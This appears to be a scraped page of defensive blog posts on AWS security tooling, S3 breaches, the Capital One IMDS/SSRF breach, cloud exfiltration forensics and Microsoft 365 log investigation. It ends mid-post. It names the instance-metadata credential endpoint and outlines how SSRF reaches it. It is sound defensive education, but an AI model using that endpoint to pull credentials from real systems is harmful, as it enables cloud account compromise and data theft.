top of page

Search Results

326 items found for ""

  • AWS Security Incident Response Guide: A Dive into CloudWatch, GuardDuty, and Amazon Detective

    AWS’s very own Security Incident Response Guide .  While I’ll cover some of the main highlights here, it’s worth taking a full look yourself—they’ve balanced the technical depth with an easy-to-follow structure. You can check out the guide. https://docs.aws.amazon.com/whitepapers/latest/aws-security-incident-response-guide/enrich-security-logs-and-findings.html ------------------------------------------------------------------------------------------------------------------------- AWS Shared Responsibility Model One of the first things to understand when working with AWS security is their Shared Responsibility Model . It's simple: AWS handles the security of the cloud infrastructure , and you’re responsible for securing what you put in the cloud . Here's the breakdown: If you’re running a VPC with EC2 instances , you need to handle things like patching the OS, securing access, and configuring networks. On the flip side, if you’re using something like an AWS Lightsail MySQL database , AWS takes care of the underlying infrastructure, while you manage the database's credentials and access settings. In short, AWS makes sure the cloud itself is secure, but it’s up to you to secure your data and apps. You can read more on this. https://aws.amazon.com/compliance/shared-responsibility-model/ ------------------------------------------------------------------------------------------------------------------------- AWS Incident Domains According to the AWS Security Incident Response Guide, there are three main domains to watch out for when responding to security incidents: Service Domain : This involves issues with the AWS account itself—usually caused by compromised credentials. Attackers might use these to access your environment, view your data, or change configurations. Infrastructure Domain : Think of this as network-level incidents , often due to a vulnerable or misconfigured app exposed to the internet . These incidents could involve an attacker gaining a foothold in your VPC, and even trying to spread within your cloud or back into your on-premises environment. Application Domain : This is when attackers target your hosted apps, often exploiting vulnerabilities like SQL injection to get unauthorized access to sensitive data. More on incident domains can be found https://docs.aws.amazon.com/whitepapers/latest/aws-security-incident-response-guide/incident-domains.html ------------------------------------------------------------------------------------------------------------------------- AWS Detection and Response Tools In case of an incident, AWS has a range of tools to help you investigate and respond. CloudTrail : Logs API activity in your account, tracking user actions, configurations, and more. It’s a key service for understanding what’s happening in your environment. CloudWatch : Monitors resources and applications, and you can set up alerts for suspicious activity. GuardDuty : AWS’s security threat detection service that specifically looks for compromised accounts or unusual activity in your environment. Macie : Focuses on sensitive data like PII and can alert you when data exposure risks arise, especially in S3 buckets . ------------------------------------------------------------------------------------------------------------------------- AWS Log Analysis: CloudTrail Overview CloudTrail  is a key player in monitoring your AWS environment. It logs all the actions taken in your AWS account at the API level, meaning everything from logins to configuration changes. The l ogs are stored for 90 days by default , but you can easily archive them in an S3 bucket for longer retention. You can search the logs using the CloudTrail console or services like Athena  and AWS Detective . By default, CloudTrail is almost real-time , with events typically logged within 15 minutes . It’s free for 90 days, but longer-term storage will require setting up a custom trail to an S3 bucket. More info can be found. https://aws.amazon.com/cloudtrail/faqs/ ------------------------------------------------------------------------------------------------------------------------- CloudTrail Log Format CloudTrail logs are stored in JSON format , making them easy to read and analyze. The logs contain useful fields, such as: API caller information  (who did what), Time of the API call , Source IP  (where the request came from), Request parameters  and response elements , which can contain nested data for more detailed information. Since AWS supports over 200 services, most of them can log actions into CloudTrail. For more details, check the supported services. https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-aws-service-specific-topics.html To under JSON Format log in easy way use below tools: https://jqlang.github.io/jq/ https://jqplay.org/ ------------------------------------------------------------------------------------------------------------------------- Anomaly Detection in AWS AWS offers several tools to detect unusual or malicious activity in your environment: CloudTrail Insights : Uses machine learning to spot strange patterns in your AWS usage, like sudden spikes in resource use or odd IAM actions . It’s not enabled by default, so you’ll need to set it up for each trail. However, there’s an extra cost for this feature (about $0.35 per 100,000 events). GuardDuty : Focuses on s ecurity issues and provides real-time threat detection across your AWS environment. Macie : Great for identifying sensitive data (like PII) and ensuring your S3 buckets are properly configured to protect that data. For more on how these services work, see the full guide. https://cloudcompiled.com/blog/cloudwatch-cloudtrail-difference/ ------------------------------------------------------------------------------------------------------------------------- AWS CloudWatch CloudWatch  is the go-to tool for monitoring in AWS , but it’s not just about keeping an eye on performance and uptime. While its core focus is availability and performance, you can send logs from most AWS services to CloudWatch , making it a versatile tool for security monitoring  too. Once logs are in, you can configure alerts and automation rules to respond to security threats. Here’s how AWS describes it: "You can use CloudWatch to detect anomalous behavior in your environments, set alarms, visualize logs and metrics side by side, take automated actions, troubleshoot issues, and discover insights to keep your applications running smoothly." It’s important to note that while basic health monitoring  with CloudWatch is free, more advanced logging and monitoring will incur additional costs . Many companies have shared their best practices for configuring CloudWatch for security monitoring. Even commercial security vendors, like TrendMicro  and Intelligent Discovery , offer predefined monitoring configurations for CloudWatch, which can also serve as inspiration for setting up your own rules . CloudWatch has layers of complexity, and while we’re only scratching the surface, it’s worth diving deeper if you want more control over your AWS monitoring. For a deeper look into AWS security monitoring, check out this article: "What You Need to Know About AWS Security Monitoring, Logging, and Alerting"   ------------------------------------------------------------------------------------------------------------------------- AWS GuardDuty If CloudWatch is AWS’s all-purpose monitor, GuardDuty  is the one with laser focus on security threats . GuardDuty scans your environment for suspicious activities across different layers, including: Control plane  (via CloudTrail management events) Data plane  (monitoring S3 data access) Network plane  (checking VPC flow logs and Route53 DNS logs) GuardDuty uses a mix of anomaly detection , machine learning , and malicious IP lists  to detect threats like unauthorized account access, compromised resources, or unusual S3 activity . What’s great is that it does all of this out-of-band , meaning it doesn’t impact the performance of your systems. Integration with major cybersecurity vendors also adds value to GuardDuty’s alerts, allowing you to get more context and take action across both cloud and on-prem environments. The pricing is based on the volume of events processed, and you can find more details about the costs and alerts it covers. https://aws.amazon.com/guardduty/pricing/ For a complete list of integrations and partners that enhance GuardDuty, check out the partner directory. https://aws.amazon.com/guardduty/resources/partners/ ------------------------------------------------------------------------------------------------------------------------- Amazon Detective Amazon Detective  is like the investigator that steps in after the alarm has been raised . It doesn’t focus on detecting threats like GuardDuty; instead, i t helps you respond to them more effectively by adding context to alert s. It pulls data from sources like GuardDuty alerts , CloudTrail logs , and VPC flow logs  to give you a clearer picture of what’s happening. Think of Detective as a tool to help you connect the dots after a security alert . It can be particularly useful when dealing with complex incidents that need deeper investigation. Like other AWS services, it comes with a 30-day free trial , but keep in mind that GuardDuty  is a prerequisite for using Detective. Another useful tool in AWS’s security stack is Security Hub , which consolidates findings from various AWS services like GuardDuty , Macie , and AWS Config  into a single dashboard for easier management. This makes it easier to see both preventative and active threat data in one place. I For more info on Detective, check out the FAQs  and their blog post "Amazon Detective – Rapid Security Investigation and Analysis"  . ------------------------------------------------------------------------------------------------------------------------- Conclusion: AWS offers a powerful suite of tools for monitoring, detecting, and investigating security incidents in your cloud environment. CloudWatch  provides a flexible platform for performance and security monitoring, enabling users to set alerts and automate actions based on logs from various AWS services. GuardDuty  takes this a step further, focusing specifically on detecting threats across control, data, and network planes using advanced techniques like machine learning and anomaly detection. When a security alert is triggered, Amazon Detective  steps in to provide valuable context, helping you analyze and respond effectively to incidents. Akash Patel

  • Power of AWS: EC2, AMIs, and Secure Cloud Storage Solutions

    AWS Regions and API Endpoints Amazon Web Services (AWS)  is a cloud platform offering a vast array of services that can be accessed and managed via APIs. These services are hosted in multiple regions  across the globe, and each AWS service in a region has a unique endpoint . An e ndpoint is a URL  that consists of a service code and region code, following the format: ..amazonaws.com Examples of Service Codes: EC2 : Elastic Compute Cloud (VMs) - ec2 S3 : Simple Storage Service - s3 IAM : Identity and Access Management - iam The l ist of all AWS services and their corresponding service codes can be found. https://docs.aws.amazon.com/general/latest/gr/aws-service-information.html Example of an API Endpoint To interact with EC2 instances in the US-East-1 region , the endpoint would be: ec2.us-east-1.amazonaws.com AWS operates over 200 services  globally, each accessible through region-specific endpoints. Reference: https://aws.amazon.com/what-is-aws/ -------------------------------------------------------------------------------------------------------------------------- Amazon Resource Name (ARN) Amazon Resource Names (ARNs)  are unique identifiers used in AWS to refer to resources programmatically. ARNs follow a specific format to ensure resources can be identified across all AWS regions and services . ARNs are commonly found in logs or configuration files when you need to specify a resource precisely. ARN Format arn:partition:service:region:account-id:resource Example: arn:aws:iam:us-east-1:690735260167:role/flowlogsRole Partition : Typically aws (for standard AWS regions) Service : The AWS service code (e.g., ec2, s3) Region : The AWS region (e.g., us-east-1) Account-ID : The AWS account ID associated with the resource Resource : Specifies the resource or resource type (can include wildcards) While ARNs can precisely specify resources, they also allow for wildcards  in some instances (e.g., for querying multiple resources). However, wildcard usage in configurations can lead to overly broad permissions, posing security risks. Reference: https://docs.aws.amazon.com/general/latest/gr/aws-arns-and-namespaces.html -------------------------------------------------------------------------------------------------------------------------- AWS Cloud Networking Constructs AWS provides a flexible and secure networking model using Virtual Private Cloud (VPC) , which allows users to create isolated networks for hosting services. Within a VPC, several components are used to manage and structure the networking: VPC (Virtual Private Cloud) : A logically isolated section of the AWS cloud where you can launch AWS resources (such as EC2 instances) within a defined network. Components within a VPC: Subnet : A segment within a VPC that allows the network to be divided into smaller sub-networks. Each VPC must have at least one subnet. Route Table : Similar to a router in a traditional network, a route table defines how traffic is routed between subnets or to external networks like the Internet . A route to the Internet requires either an Internet Gateway  or NAT Gateway . Internet Gateway : This allows EC2 instances with public IPs  to access the Internet. While the instance's network interface retains its private IP, an Internet Gateway enables the routing of traffic between the instance's public IP and external sources. NAT Gateway : Used for outgoing Internet traffic  from instances with private IP addresses . It performs a similar function to home network NAT gateways, allowing private instances to connect to the Internet. Security Group : A virtual firewall that controls inbound and outbound traffic for EC2 instances. Security groups can be specific to an individual EC2 instance or shared across multiple instances within the same VPC. Reference: https://docs.aws.amazon.com/general/latest/gr/aws-arns-and-namespaces.html -------------------------------------------------------------------------------------------------------------------------- AWS Computing Constructs EC2 (Elastic Compute Cloud)  is AWS's scalable virtual machine (VM) service that runs on their proprietary hypervisor. EC2 provides a range of instance types to suit different workloads, from general-purpose instances to compute-optimized and memory-optimized configurations. You can explore the variety of available instance types  on the AWS EC2 instance types page . Key Features: Instance Types : Different combinations of CPU, memory, storage, and networking to fit various use cases. Auto-Scaling : EC2 instances can be dynamically scaled based on traffic or load requirements. Pay-As-You-Go Pricing : You only pay for what you use, based on the time and resources consumed. AMI (Amazon Machine Images) AMIs are pre-configured VM templates designed for easy deploymen t. These images come with the necessary operating systems and utilities to run in AWS. AMIs vary from minimal base OS images (such as Linux or Windows) to complex images pre-installed with software for specific tasks. SIFT AMI : One notable AMI available is the SANS Community SIFT  VM, a preconfigured forensic image, which can be found via its GitHub repository . AWS Marketplace : Thousands of AMIs are available through the AWS Marketplace , including those with licensed commercial software. -------------------------------------------------------------------------------------------------------------------------- AWS Storage Constructs AWS provides a variety of storage options, including S3 (Simple Storage Service)  and EBS (Elastic Block Storage) , each serving different purposes based on accessibility, scalability, and performance needs. S3 (Simple Storage Service) S3  is an object storage service known for its scalability, flexibility, and durability . S3 allows users to store any type of data (files, media, backups) and access it from anywhere on the internet. Highly Scalable : You can store an unlimited amount of data. Object-Based Storage : Ideal for files and media rather than application disk storage. Access Controls : S3 features complex permission settings, including bucket policies, access control lists (ACLs), and encryption. S3 Security : Despite its flexibility, S3 has been involved in multiple data breaches due to misconfigurations . While AWS has improved the UI to minimize user errors, poor configurations have historically exposed large amounts of data. For example: High-profile breaches occurred due to public access settings  or misinterpretations of policies, like the "Any authenticated AWS user" option, which inadvertently opened data access to any AWS account. EBS (Elastic Block Storage) EBS  is a block storage service primarily used as a hard drive for EC2 instances . EBS volumes are tied to specific EC2 instances and are ideal for applications requiring consistent, low-latency disk storage. Volume Types : Different types of EBS volumes support various workloads, such as SSD  for high transactional applications and HDD  for throughput-focused tasks. Snapshots : EBS volumes can be easily backed up using snapshots, which can be stored long-term or used for disaster recovery. References. https://aws.amazon.com/ebs/ -------------------------------------------------------------------------------------------------------------------------- S3 in the News for the Wrong Reasons Several S3 data breaches  have occurred over the years, often d ue to misconfigurations  rather than inherent security flaws . Two common issues include: Overly Broad Permissions : Administrators have mistakenly allowed public access or configured the built-in group " Any authenticated AWS user ," granting access to anyone with an AWS account rather than just their organization. Hard-coded Security Keys : Developers have accidentally exposed AWS access keys  in code repositories, like GitHub, leading to unauthorized access. For instance, in one notable incident, AWS keys were committed to a public GitHub repository, and within 5 minutes , attackers had exploited the keys to spin up EC2 instances for cryptocurrency mining. To help prevent these issues, AWS has implemented features that detect leaked credentials and restrict public access to S3 buckets by default. Examples of S3 breaches include: U.S. Voter Records : In a 2017 breach, 198 million U.S. voter records  were exposed due to a misconfigured S3 bucket . Defense Contractor : Sensitive intelligence data was exposed when an S3 bucket belonging to a defense contractor was left publicly accessible . https://www.zdnet.com/article/security-lapse-exposes-198-million-united-states-voter-records/ https://arstechnica.com/information-technology/2017/05/defense-contractor-stored-intelligence-data-in-amazoncloud-unprotected/ https://www.theregister.com/2020/07/21/twilio_javascript_sdk_code_injection/ https://github.com/nagwww/s3-leaks -------------------------------------------------------------------------------------------------------------------------- Conclusion AWS provides powerful and scalable cloud computing and storage solutions through services like EC2, AMIs, S3, and EBS. These services offer flexibility for a wide range of workloads, whether you need virtual machines, pre-configured templates, or reliable storage options. However, with great flexibility comes responsibility—especially when it comes to security. Misconfigurations in S3 buckets and improper access management can lead to serious data breaches, as seen in numerous high-profile incidents. By following best practices for access control, encryption, and key management, users can leverage AWS’s full potential while maintaining robust security and compliance. Akash Patel

  • AWS: Understanding Accounts, Roles,Secure Access and AWS Instance Metadata Service (IMDS) and the Capital One Breach

    Amazon Web Services (AWS) has grown into a powerful platform used by businesses around the world to manage their data, infrastructure, and applications in the cloud. From its beginnings in 2006 with Simple Storage Service (S3) , AWS has evolved into a multi-layered service offering that powers much of today’s internet. ---------------------------------------------------------------------------------------------------------- AWS Control Tower and AWS Organizations: Structuring Your Cloud Environment At the heart of AWS deployments is the AWS account . Each AWS account provides a dedicated environment where you can host services like S3, EC2 (Elastic Compute Cloud), databases, and more. But managing these services across multiple departments or projects in a single account can get tricky. T his is where AWS Control Tower  and AWS Organizations  come in. What is AWS Control Tower? AWS Control Tower  is a tool designed to help set up and manage a multi-account AWS environment . Think of it as a blueprint or template that helps you organize and secure multiple AWS accounts under a single organization. Even though it’s not mandatory, using Control Tower is a recommended practice for companies managing a large cloud environment . It provides an easy way to enforce security policies and best practices across all accounts. What is AWS Organizations? AWS Organizations  allow you to group multiple AWS accounts together under one roof, making it easier to manage them from the top down. This structure enables you to apply consistent administration  and security policies  across all your accounts . Within AWS Organizations, you can create Organizational Units (OUs)  to group accounts for specific business units or projects, and apply different policies to each group. For example, your HR department  could have separate accounts for hosting employee data, while the Sales department  could have accounts for managing customer data. By separating these functions, you can secure them independently and keep billing records clean and accurate for each department. ---------------------------------------------------------------------------------------------------------- Managing AWS Accounts and Root Users Each AWS account has a root user  created when the account is first set up . This root user has full control over the account, but best practices suggest minimizing the use of the root user  to prevent security risks. Instead, i t's better to create Identity and Access Management (IAM)  users or roles to manage day-to-day operations . IAM Users and Roles IAM (Identity and Access Management)  is AWS’s system for managing user permissions and access. It allows you to create users  and assign roles  based on what tasks they need to perform. For example, an administrator might have full access to everything, while a developer might only need access to specific services like EC2 or S3. IAM users : These are individual identities with specific permissions. For example, Jane might have an IAM user account with access to AWS Lambda but not EC2. IAM roles : These allow temporary access to an AWS account for specific tasks. Roles are often used for cross-account access  or to allow external services to access AWS resources. The principle of Least Privilege  is key here —only give users and roles the minimum permissions they need to do their jobs. ---------------------------------------------------------------------------------------------------------- AWS Secure Token Service (STS) and Temporary Credentials When users or services need temporary access to AWS resources , they can use the AWS Secure Token Service (STS ) . S TS generates temporary credentials  that can last from a few minutes to several hours. This is particularly useful for external users  or cross-account access , where you don’t want to hand out long-term credentials. STS credentials : These are similar to regular I AM credentials but are short-lived, reducing the risk of them being compromised. After they expire, users need to request new credentials. Federation and roles : If you have users who are authenticated through external services (like Google or Active Directory), STS can provide temporary AWS access by using federated roles . For example, if a consultant needs access to your AWS environment, you can create a temporary IAM role with limited permissions, and they can assume that role using STS. ---------------------------------------------------------------------------------------------------------- Best Practices for Secure AWS Authentication There are several ways to log into AWS, but the most common methods are through the AWS Management Console , AWS CLI , or programmatically using access keys . Here’s how to make sure your environment stays secure: 1. Use Multi-Factor Authentication (MFA) For both the root account  and any IAM users, it’s highly recommended to enable MFA . This adds an extra layer of security, requiring both a password and a one-time code from a mobile app or hardware token. 2. Rotate Access Keys For programmatic access, AWS provides access key and secret key  combinations. It’s important to regularly rotate these keys  to reduce the risk of exposure. AWS allows each user to have two active sets of access keys, making it easier to rotate them without disrupting services. 3. Use Short-Term Credentials When possible, avoid using long-term credentials like access keys . Instead, use temporary credentials  via STS or instance roles. These credentials expire after a set time, reducing the risk of misuse. ----------------------------------------------------------------------------------------------------------- AWS Roles, Federation, and Cross-Account Access One of AWS’s strengths is its ability to manage roles across different accounts and even organizations. For instance, AWS allows cross-account access through roles. Let’s say your company is collaborating with a third party, and they need access to your AWS resources. You can create a role for them to assume in your account, granting them limited, temporary access. Federation : Allows users from an external directory (like Active Directory) to access AWS resources using Single Sign-On (SSO)  or SAML authentication . Cross-account roles : These allow users from one AWS account to assume roles in another AWS account, similar to trusts between domains in Microsoft Active Directory. ---------------------------------------------------------------------------------------------------------- For further reading, check out AWS's comprehensive guides on best practices: AWS IAM Best Practices AWS Organizations FAQs AWS Secure Token Service (STS) ---------------------------------------------------------------------------------------------------------- What is the AWS Instance Metadata Service (IMDS)? The AWS Instance Metadata Service (IMDS)  is a feature available on Amazon EC2 instances  that provides information about the instance and temporary IAM credentials. It allows the instance to retrieve details like its hostname, network configuration, and most importantly, the IAM role credentials assigned to the instance. While useful for many applications, IMDS also presents a potential security risk if misused, as seen in the infamous Capital One data breach . The I nstance Metadata Service (IMDS)  runs on a dedicated non-public network  and is accessible only from within the EC2 instance itself. IMDS provides crucial information for an EC2 instance, including temporary credentials for any IAM role assigned to the instance . The metadata can be accessed at the following endpoints: IPv4 : http://[169.254.169.254]/latest/meta-data/ IPv6 : http://[fd00:ec2::254]/latest/meta-data/ IAM Role Credentials via Metadata When an EC2 instance is configured with an IAM role , you can retrieve the role’s temporary access credentials  using the metadata service. By querying: http://169.254.169.254/latest/meta-data/iam/security-credentials/ You’ll receive the Access Key ID , Secret Key , and Session Token  in clear text , which can be used to interact with AWS services like S3. The temporary credentials  are typically short-lived, providing an extra layer of security since they expire after a certain time. While this service is extremely convenient for developers and system administrators, it can also be exploited if an attacker manages to access the EC2 instance or misconfigurations allow indirect access. ---------------------------------------------------------------------------------------------------------- Potential Exploits of IMDS Though the metadata service is restricted to internal network access, attackers can still gain access to sensitive data through various techniques if the EC2 instance is compromised. Server-Side Request Forgery (SSRF) Attacks One of the most notorious attack vectors is Server-Side Request Forgery (SSRF) , where an attacker tricks a vulnerable application into querying internal services, such as the metadata service. By manipulating web requests, an attacker can obtain the instance's metadata, including the IAM role credentials, which they can then use to access AWS resources. For example, misconfigured reverse proxies  can be exploited by sending HTTP requests with modified headers to trick the proxy into querying the metadata service . A 2018 article by Michael Higashi, “Instance Metadata API: A Modern Day Trojan Horse,” highlighted how simple this can be using a curl command to obtain sensitive credentials by querying the internal metadata service. ---------------------------------------------------------------------------------------------------------- The Capital One Data Breach In 2019 , one of the largest cloud data breaches in history affected Capital One , resulting in the exposure of sensitive information of more than 100 million customers . This breach was directly related to the misuse of AWS instance metadata. How the Attack Happened SSRF Vulnerability : The attacker identified a vulnerable web application firewall (WAF)  running on an EC2 instance in Capital One’s environment . By using a Server-Side Request Forgery (SSRF)  attack, the attacker was able to query the instance metadata service  and steal the EC2 instance’s temporary IAM role credentials . Using IAM Role Credentials : After obtaining the credentials, the attacker used them to gain access to Amazon S3 buckets . These credentials provided read access to over 700 S3 buckets  containing sensitive data. The attacker copied the data, which included personal and financial information. Data Exfiltration : The attacker exfiltrated sensitive data belonging to Capital One customers, including Social Security Numbers , bank account details , and credit scores . This breach not only revealed security misconfigurations within Capital One’s infrastructure but also highlighted the risks associated with IMDS  when misused. Mitigating the Risk: IMDSv2 After the Capital One breach and similar incidents, AWS introduced IMDSv2  to address these risks . The key improvements include: Session Token Requirement : I MDSv2 requires a session token   to be obtained using an HTTP PUT request before any data can be accessed. This prevents simple GET requests from accessing sensitive metadata. Protection Against SSRF : Most WAFs  and reverse proxies do not support PUT requests, making it much harder for attackers to exploit SSRF vulnerabilities to access IMDS. TTL Settings : The new version sets the Time-to-Live (TTL)  for metadata requests to 1, which prevents external routing hosts from passing the requests further, reducing the chances of metadata leaks. While IMDSv2 greatly reduces the risk of metadata service attacks, AWS has not deprecated IMDSv1 . Organizations need to actively switch to IMDSv2  and enforce its use to protect their EC2 instances from similar exploits. ---------------------------------------------------------------------------------------------------------- How to Secure EC2 Instances Against Metadata Exploits Here are key steps you can take to protect your AWS environment from metadata-related attacks: Use IMDSv2 : When launching new EC2 instances, configure them to use IMDSv2 . AWS allows you to enforce this via instance metadata options. You can set a requirement for all metadata requests to use session tokens , adding an extra layer of security. Limit IAM Role Permissions : Apply the principle of Least Privilege  to IAM roles assigned to EC2 instances. Ensure that roles only have access to the minimum AWS resources they need. Monitor for SSRF Exploits : Regularly audit your web applications for SSRF vulnerabilities . Tools like AWS WAF  and third-party security solutions can help detect and block suspicious requests that could lead to SSRF attacks. Enable Logging and Alerts : Use AWS CloudTrail to monitor API activity, including the usage of temporary credentials  retrieved from the metadata service. Set up alerts for unusual activity, such as large-scale S3 data access. Use Network Security Groups (NSGs) : Apply Network Security Groups  to control inbound and outbound traffic for your EC2 instances. Restrict network access to only what is necessary for the instance to function. ----------------------------------------------------------------------------------------------------------\ Conclusion AWS provides a powerful and flexible cloud platform, but managing its security requires a thoughtful approach to account structure, user management, and access controls. By using tools, you can ensure that your AWS environment remains secure, scalable, and easy to manage. The AWS Instance Metadata Service (IMDS)  is also an powerful tool, but it comes with significant risks if misconfigured or exploited. By upgrading to IMDSv2 , following best practices for IAM role management , and actively monitoring for vulnerabilities, organizations can secure their cloud infrastructure and avoid similar incidents. Akash Patel

  • Cloud Services: Understanding Data Exfiltration and Investigation Techniques

    In today’s cybercrime landscape, attackers are increasingly turning to cloud services for data exfiltration. While this presents additional challenges for defenders, it also offers opportunities to track and mitigate the damage. The Shift to Cloud-Based Exfiltration Cloud storage providers have become popular among attackers because they meet key requirements: Speed and availability : Attackers need fast, scalable infrastructure to quickly move large amounts of stolen data. Cost-efficiency : Many cloud services offer significant storage at minimal or no cost. Less visibility : Cloud platforms are generally not on security blacklists, making it harder for traditional defenses to detect the exfiltration. Attackers streamline their operations by using cloud platforms to exfiltrate data. In some cases, the copy stored in the cloud is the only copy the attackers have , which they later use to demand ransom or release the data publicly . The efficiency of using a single storage location means attackers can avoid time-consuming data copying, making their extortion schemes quicker and harder to track. Fast Response from Cloud Providers While attackers use cloud platforms, t he providers have become more cooperative  in helping victims. Many c loud providers act quickly on takedown requests, often removing malicious data within hours or minutes . This means that although cloud services are used for exfiltration, they are rarely used for data distribution because of the prompt responses from the providers. However, gaining access to the cloud shares used for exfiltration can provide valuable insights for the victim. Accessing the attacker’s cloud storage allows investigators to: Assess the extent of the data stolen . Make the data unusable  by inserting traps like canary tokens or zip bombs . Gather information on other potential victims , especially when attackers reuse cloud accounts across multiple breaches. In some instances, investigators have been able to notify other breached organizations before the attackers could fully execute their plans, offering a rare preemptive defense against encryption or further exfiltration. ---------------------------------------------------------------------------------------------------------- Investigating the Exfiltration Process During investigations, we often find that attackers have used common tools and techniques to identify and exfiltrate sensitive data from an organization’s network. Ransomware cases frequently reveal how attackers plan their operations, from identifying sensitive file shares to the exfiltration itself. The following steps provide an outline of the typical exfiltration process: 1. Scanning for Sensitive Shares Attackers often start by scanning the network for shared folders that might contain sensitive data. Tools like SoftPerfect Network Scanner  are frequently used for this task . These tools display available share names and show which users are logged in to the machines, helping attackers prioritize targets. From an investigative standpoint, defenders can sometimes recover partial screenshots or cache files of the attacker’s scanning activity. For example, attackers may be particularly interested in machines where admin users  are logged in or shares named after departments like “HR,” “Finance,” or “Confidential.” Fortunately, these shares may not always contain the most critical data, but they still serve as key entry points for attackers. 2. Tracking the Attackers’ Actions Understanding what the attackers were looking for and where they browsed can be crucial for assessing the damage. To do this, d efenders can rely on artifacts like MountPoints  and Shellbags , both of which provide forensic insights into the attackers’ activities. MountPoints : These are stored in registry keys and show w hat external storage devices (like USB drives) or network shares were mounted. By examining the registry, investigators can track what shares attackers connected to using the “net use” command. Tools like Registry Explorer  by Eric Zimmerman are particularly useful for browsing these entries. Shellbags : These artifacts store user preferences for Windows Explorer windows, including the location and size of the windows. They also store the directory paths  the user browsed. Since Shellbags are stored per user, investigators can pinpoint specific actions by the attacker, even tracking when and where they navigated . Shellbag Explorer  is another tool by Zimmerman that helps present this data in a clear, tree-like structure. https://www.cyberengage.org/post/shell-bags-analysis-tool-sbecmd-exe-or-shellbagsexplorer-gui-version-very-important-artifact When attackers use an account that should never have interactive sessions (such as a service account), Shellbags allow investigators to reconstruct where they navigated using Windows Explorer, complete with timestamps. ---------------------------------------------------------------------------------------------------------- Tools Used by Attackers for Exfiltration In our investigations, we frequently encounter two tools for data exfiltration: rclone  and MegaSync . Both tools allow for efficient, encrypted data transfer, making them ideal for attackers. 1. MegaSync MegaSync is the o fficial desktop app for syncing with Mega.io , a cloud storage platform popular with attackers due to its encryption and large storage capacity. While the traffic and credentials for MegaSync are heavily encrypted, the application generates a logfile  in binary format . Tools like Velociraptor can parse these log files to extract the names of uploaded files, giving investigators a clearer idea of what was exfiltrated. 2. Rclone Rclone is a command-line tool for managing files across more than 40 cloud storage platforms, including Mega.io . Its appeal lies in its support for HTTPS uploads, which bypass many traditional security filters like FTP. Attackers often create a configuration file  (rclone.conf) to store credentials and other transfer settings, speeding up the exfiltration process by minimizing the number of commands they need to enter. Investigators can target these configuration files, which hold valuable information such as the cloud service being used, stored credentials, and more. In many cases, the configuration file may be encrypted, but attackers occasionally decrypt certain files to prove they have the keys. Investigators can sometimes trick the attackers into decrypting the rclone.conf  file, allowing them to gain access to the exfiltration details. Alternative Techniques for Recovering Exfiltration Data Even if direct access to the rclone configuration is not possible, defenders can use more advanced methods like volume snapshots  and string searches  to recover artifacts related to the exfiltration. Volume snapshots : These provide older versions of a hard drive, akin to Apple’s Time Machine. Although attackers often try to delete these snapshots, tools like vss_carver  can help recover them, providing valuable forensic data. https://github.com/mnrkbys/vss_carver String searches : Tools like bulkextractor  and YARA  can search hard drives and memory for residual traces of configuration files or rclone-related artifacts, helping to uncover more about the attackers’ activities. Regex combined for searching Mega and rclone In some cases, investigators can even use these methods to track down the attackers’ infrastructure and work with law enforcement to take further action. Cloud providers often have detailed logs showing when the data was uploaded, whether it was downloaded again, and from where ---------------------------------------------------------------------------------------------------------- Conclusion As attackers increasingly leverage cloud services to exfiltrate stolen data, organizations need to adapt their incident response strategies accordingly. Understanding how attackers use tools like rclone and MegaSync can help defenders detect exfiltration attempts faster and take steps to mitigate the damage. By carefully analyzing forensic artifacts like MountPoints, Shellbags, and volume snapshots, investigators can reconstruct attacker activities and gain insight into the extent of the breach. Akash .Patel

  • Microsoft 365 Security: Understanding Built-in Detection Mechanisms and Investigating Log Events

    As the landscape of cybersecurity threats evolves, protecting sensitive information stored within enterprise platforms like Microsoft 365 (M365) has become a top priority for IT and security teams. To help organizations identify and mitigate these risks, Microsoft provides a range of built-in detection mechanisms based on user activity and sign-in behavior analysis. While these tools can offer significant insights, it’s important to understand their limitations, potential false positives, and how to effectively investigate suspicious events. ------------------------------------------------------------------------------------------------------------- Built-In Reports: Monitoring Risky Activity Microsoft 365's built-in reporting suite provides several out-of-the-box detection features that monitor risky user behavior and sign-in activity. These include: Risky sign-ins : Sign-ins flagged as risky due to factors like unusual IP addresses, impossible travel, or logins from unfamiliar devices. Risky users : User accounts exhibiting abnormal behavior, such as frequent failed login attempts or multiple sign-ins from different geographies. Risk detections : A general term referring to any identified behavior or event that deviates from normal patterns and triggers a system alert. These alerts are largely powered by machine learning and heuristic algorithms that analyze stored log data to identify abnormal behavior patterns . The system is designed to recognize potential security risks, but it does have some caveats. ------------------------------------------------------------------------------------------------------------- Built-In Risk Detection: Delays and False Positives One of the most important things to understand about Microsoft’s risk detection mechanisms is that they are not instantaneous. Alerts can take up to 8 hours to be generated , meaning there is a delay between the detection of a suspicious event and the time it takes for the alert to surface. This delay is designed to allow the system to analyze events over time and avoid triggering unnecessary alerts, but it also means that organizations may not be alerted to security incidents immediately. Another challenge is that these alerts can sometimes generate false positives . A common example is the geolocation module  and its associated “ impossible travel ” alert. This is triggered when a user signs in from two geographically distant locations within a short time, which would be impossible under normal circumstances. However, the issue often arises from incorrect IP location data, such as when users connect to the internet via hotel networks, airplane Wi-Fi, or mobile carriers. For instance, if a user switches from airplane internet to airport Wi-Fi, the system may mistakenly flag it as an impossible travel scenario, even though the user hasn’t changed locations. Managing False Positives Because these false positives can clutter security dashboards, it’s important for IT teams to review and refine their alerting thresholds. Regular tuning of the system and awareness of typical user behaviors—such as frequent travelers—can help minimize the noise created by these alerts and focus on genuine threats. ------------------------------------------------------------------------------------------------------------- Investigating and Profiling Logons When a suspicious event is detected, one of the first steps in investigating the issue is analyzing logon data. Microsoft’s Unified Audit Logs (UAL) track over 100 types of events, including both successful and unsuccessful login attempts. Here are some key strategies for analyzing logons and identifying potential security breaches: Tracking Successful Logins Every successful login generates a UserLoggedIn  event , which includes valuable information such as the source IP address . Investigators can use this data to identify unusual logon behavior, such as logins from u nexpected geographical locations or times . Temporal or geographic outliers—such as a login from a country the user has never visited—can be red flags that warrant further investigation. Additionally, a pattern of failed logon attempts  (logged as UserLoginFailed  events) followed by a successful login from a different or suspicious IP address may suggest that an attacker was trying to brute-force or guess the user’s password before successfully logging in. Investigating Brute-Force Attacks Brute-force attacks —where an attacker attempts to gain access by repeatedly guessing the user's credentials —leave distinctive traces in the log data. One common sign of a brute-force attack is when a user gets locked out of their account after multiple failed login attempts. In this case, you would see a sequence of UserLoginFailed  events followed by a “ IdsLocked ” event , indicating that the account was temporarily disabled due to too many failed attempts. Further, even if the user account doesn’t exist, the system will log the attempt with the term UserKey=“Not Available” , which can help identify instances of user enumeration 